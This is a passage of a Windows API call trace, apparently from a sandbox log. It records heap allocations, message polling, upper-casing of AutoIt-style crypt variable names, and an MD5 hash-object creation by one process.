returned 0x2e54bd8 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0188.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0188.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0188.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0188.089] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.089] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0188.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.089] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0188.089] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.089] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0188.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.089] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0188.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0188.090] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0188.090] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0188.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0188.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0188.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.090] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0188.090] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.090] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0188.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0188.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0188.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0188.091] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0188.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0188.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0188.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0188.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0188.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0188.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0188.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0188.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0188.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0188.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0188.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0188.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0188.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0188.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0188.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0188.174] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0188.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0188.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0188.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0188.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0188.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0188.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54eb8 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0188.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0188.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0188.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0188.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0188.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0188.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: 